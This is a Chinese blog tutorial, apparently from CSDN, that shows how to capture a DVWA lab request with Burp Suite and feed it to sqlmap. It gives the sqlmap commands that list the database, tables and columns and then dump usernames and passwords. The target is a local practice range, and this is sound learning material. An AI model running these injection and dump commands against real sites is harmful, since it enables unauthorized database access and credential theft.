使用burpsuite抓包 + sql工具注入 dvwa初级靶场

本文介绍了如何使用BurpSuite进行网络抓包,并配合火狐浏览器设置代理,以192.168.92.1/dvwa-master访问靶场。接着,通过BurpSuite保存注入点的包,并用SQLMap工具查询DVWA靶场的数据库名、数据表和数据列,最终读取用户和密码信息。过程中提到了解决浏览器显示问题和SQLMap更新问题的方法。
摘要由CSDN通过智能技术生成

使用burpsuite抓包 + sql工具注入 dvwa靶场

记录一下自己重新开始学习web安全之路②。

一、准备工作

1.工具准备 sqlmap + burpsuite

2.浏览器准备 火狐浏览器 + 设置代理。

首先,先设置一下火狐浏览器的代理

1

http代理地址为127.0.0.0.1 ,端口为8080

3.burpsuite 准备 将burpsuite的抓包功能打开。

注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问

怎么查到本地网卡ip?

在cmd中输入ipconfig

2

得到本地网卡ip 192.168.92.1

如果是无线网,那么找无线网适配器的IPV4地址

3

通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。

4

在搜索框输入之后,点击submit。

通过burpsuite抓包得到

5

注:抓到的包必须是注入点的包

如:
(GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等

然后在burpsuite中 点击Action — Save item 保存到本地。

保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。

目标:拿账号密码(数据)

1.查询数据库的名称 (dvwa)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db

6

7

-r // 指定读取本地文件

–current-db //列出当前网站数据库名称

2.查询数据表的名称 (guestbook 、users)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables

8

9

-D //指定数据库名称

–tables //数据表

3.查询数据列的名称 (user 、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns

10

11

-T //指定数据表的名称

–columns //列出数据列的名称

4.读取数据 (user、password)

python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump

12

13

-C //指定数据列的名称

–dump // 读取数据

拿账号密码时遇到的问题:

1.首先是burpsuite抓包时 火狐浏览器显示

14

通过百度得到解决办法:

15

2.sqlmap,更新问题,可以不用管,但是一开始看到有警告,去官网下了一个新的sqlmap即可。

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值